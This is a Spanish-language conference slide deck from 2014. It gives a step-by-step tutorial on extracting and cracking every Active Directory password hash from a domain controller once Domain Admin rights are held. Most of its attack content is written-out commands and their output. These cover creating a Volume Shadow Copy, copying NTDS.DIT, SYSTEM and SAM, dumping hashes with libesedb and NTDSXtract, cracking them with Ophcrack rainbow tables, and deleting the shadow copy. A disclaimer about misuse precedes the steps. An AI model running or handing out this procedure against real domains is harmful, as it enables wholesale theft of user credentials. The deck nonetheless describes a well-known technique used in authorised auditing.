Como obtener contraseñas del directorio activo con permisos

de Domain Admin

Ing. Pedro Joaquín@_hkm

Reunión de la Comunidad Underground de México 2014

28 de junio del 2014

Advertencia

• El propósito de esta presentación es demostrar de manera práctica una técnica conocida de obtención de las contraseñas del Directorio Activo a partir de una cuenta con permisos de Domain Admin.

• El autor, ni la organización que representa se responsabilizan por el mal uso que se le pueda dar a las técnicas mostradas a continuación.

• El acceso no autorizado a sistemas o equipos de computo, conocer, copiar, modificar o destruir información, y la intervención de cuentas de correo son delitos sancionados en el Código Penal Federal.

• Recomendamos informar a los usuarios que su contraseña puede ser observada por los administradores de la red.

Tres simples pasos

1. Copiar los archivos NTDS.DIT y SYSTEM del controlador de dominio.

2. Extraer los hashes de los archivos.

3. Descifrar (“Crackear”) los hashes.

Tres simples pasos

1. Copiar los archivos NTDS.DIT y SYSTEM del controlador de dominio.

2. Extraer los hashes de los archivos.

3. Descifrar (“Crackear”) los hashes.

Copiar los archivos NTDS.DIT y SYSTEMCrear un Volume Shadow Copy,

Copiar los archivos del Volume Shadow,

Borrar la Volume Shadow Copy

NTDS.DIT y SYSTEM

NTDS.DIT

Archivo donde se almacena toda la información del directorio activo. Se encuentra en %SystemRoot%\ntds\NTDS.DIT.

SYSTEM

Contiene el registro SYSTEM el cual contiene la bootkey (SYSKEY) necesaria para extraer los hashes del NTDS.DIT.

** Los archivos se encuentran protegidos para que no se puedan copiar fácilmente. Es necesario extraerlos de una Volume Shadow Copy

Volume Shadow Copy

• El Volume Shadow Copy eres un sistema de respaldo de unidades de Windows que permite crear copias de archivos ocultos como el NTDS.DIT, SYSTEM, SAM, etc.

• Se puede utilizar el comando vssadmin list shadows para saber si existen copias creadas:

C:\>vssadmin list shadows

vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool

(C) Copyright 2001 Microsoft Corp.

No items found that satisfy the query.

Crear una Volume Shadow Copy

C:\>vssadmin create shadow /for=c:

vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool

(C) Copyright 2001 Microsoft Corp.

Successfully created shadow copy for ‘c:\’

Shadow Copy ID: {e8eb7931-5056-4f7d-a5d7-05c30da3e1b3}

Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1

Se utiliza el comando vssadmin create shadow /for=c: para crear una copia de la unidad c:

Copiar los archivos del Volume Shadow Copy

• Comandos para copiar los archivos requeridos al directorio actual:

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\ntds\ntds.dit .

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SYSTEM .

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SAM .

[X] Es el identificador de la copia, ver diapositiva anterior.

En algunos sistemas como Windows 2003 y 2008 la ruta \windows\ puede variar a \WINNT\

Para borrar la Volume Shadow Copy

C:\> vssadmin delete shadows /for=C: /shadow= e8eb7931-5056-4f7d-a5d7-05c30da3e1b3

Extracción de los hashesExtraer las tablas con libesedb

Extraer los hashes con NTDSXtract

Extracción de los hashes

• Para extraer los hashes es necesario tener la tabla database y link del archivo NTDS.DIT y el archivo SYSTEM.

• Utilizaremos las herramientas de libesedb para extraer las tablas del NTDS.DIR y posteriormente ntdsxtract para utilizar las tablas y el SYSTEM para obtener los hashes.

• Estas herramientas corren en Linux.

Descarga e instalación de libesedb

# wgethttp://libesedb.googlecode.com/files/libesedb-alpha-20120102.tar.gz

# tar -xzvf libesedb-alpha-20120102.tar.gz

# cd libesedb-20120102

# ./configure

# make

# mv esedbtools/ /usr/local

# cd esedbtools/

esedbexport (parte de libesedb)

• Syntaxis:

#./esedbexport –t <directorio de salida> <archivo ntds.dit>

• Este comando tardará mucho. Aprox 25 minutos. Si en 25 minutos parece que no esta avanzando hay que presionar Enter para actualizarlo.

• La salida de comando debe ser similar a la siguiente diapositiva…

# ./esedbexport -t ~/ntds ~/ntds.ditesedbexport 20120102Opening file.

Exporting table 1 (MSysObjects) out of 11.Exporting table 2 (MSysObjectsShadow) out of 11.Exporting table 3 (MSysUnicodeFixupVer1) out of 11.Exporting table 4 (datatable) out of 11.Exporting table 5 (link_table) out of 11.Exporting table 6 (hiddentable) out of 11.Exporting table 7 (sdproptable) out of 11.Exporting table 8 (sd_table) out of 11.Exporting table 9 (quota_table) out of 11.Exporting table 10 (quota_rebuild_progress_table) out of 11.Exporting table 11 (MSysDefrag1) out of 11.Export completed.

Nombres de archivos exportados

# ls ~/ntdis.export/

MSysObjects.0

MSysObjectsShadow.1

MSysUnicodeFixupVer1.2

datatable.3

link_table.4

hiddentable.5

sdproptable.6

sd_table.7

quota_table.8

quota_rebuild_progress_table.9

MSysDefrag1.10

• No utilizaremos todos los archivos, únicamente el datatable3, link_table.4 y el SYSTEM.

Descarga e instalación de NTDSXtract

# wget http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_2_beta.zip

# unzip ntdsxtract_v1_2_beta.zip

# cd ntdsxtract_v1_2_beta

Extracción de hashes

• # python dsusers.py ~/ntds.export/datatable.3~/ntds.export/link_table.4 ~/TEMP --passwordhashes --lmoutfile LM.out --ntoutfile NT.out --pwdformat ophc --syshive ~/SYSTEM

• Se ejecuta un comando similar donde le estamos diciendo la ubicación del datatable.3, link_table.4 y SYSTEM y esperando el resultado de los hashes en formato ophc (Ophcrack). Nos generará dos archivos uno de hashes, uno para LM LM.out y otro de hashes NT NT.out.

Descifrar (“Crackear”) los hashesDescargando Ophcrack,

Obteniendo las Rainbow Tables,

Crackeando los hashes

Rainbow tables

• El cifrado NTLM se puede romper utilizando Rainbow Tables que son tablas precomputadas de hashes.

• Las tablas recomendadas ya que son relativamente pequeñas y se pueden obtener fácilmente son las XP_Special y las Vista_Special.

• Las tablas son gratuitas. El sitio oficial de las tablas es: http://sourceforge.net/projects/ophcrack/files/tables/ pero por simplicidad de la descarga y velocidad recomiendo utilizar los torrents de

• http://thepiratebay.se/torrent/4467431/Ophcrack_XP_Special_Tables

• http://thepiratebay.se/torrent/4403978/Ophcrack_Vista_Special_NTHASH_Table

Descargando e instalando Ophcrack

• Ophcrack puede ser utilizado como un LiveCD o desde Windows.

• Se descarga de http://ophcrack.sourceforge.net/

• En este tutorial utilizaremos la versión de Windows, la configuración es la misma en la versión LiveCD de Linux.

• La diferencia principal es que la versión de LiveCD de Linux puede obtener automáticamente los hashes de la computadora donde se ejecuta.

Utilizando Ophcrack

• En el menú principal de Ophcrack se seleccciona Load y PWDUMP file

• Abrimos el archivo de las contraseñas NT.out y/o LM.out

Utilizando Ophcrack – Rainbow tables

• En el menú principal de Ophcrack se seleccciona Tables y posteriormente Install.

• Seleccionamos los directorios donde se encuentran las tablas Vista_special y XP_special.

• Se recomienda habilitar una tabla a la vez, primero con XP_special.

Crackeando las contraseñas

• En el menú principal de Ophcrackseleccciona Crack.

• El proceso puede tomar varias horas, pero el resultado vale la pena…

Como obtener contraseñas del directorio activo con permisos

de Domain Admin

Ing. Pedro Joaquín@_hkm

Reunión de la Comunidad Underground de México 2014

28 de junio del 2014

Referencias

• Código Penal Federal, en materia de delitos en contra de medios o sistemas informáticos:

http://gaceta.diputados.gob.mx/Gaceta/61/2012/mar/20120328-III.html#DictamenaD2

• Getting Hashes from NTDS.dit file:

http://blog.walkerville.org/?p=486

• libesedb:

https://code.google.com/p/libesedb/

• NTDSXtract:

http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_2_beta.zip

• Ophcrack:

http://ophcrack.sourceforge.net/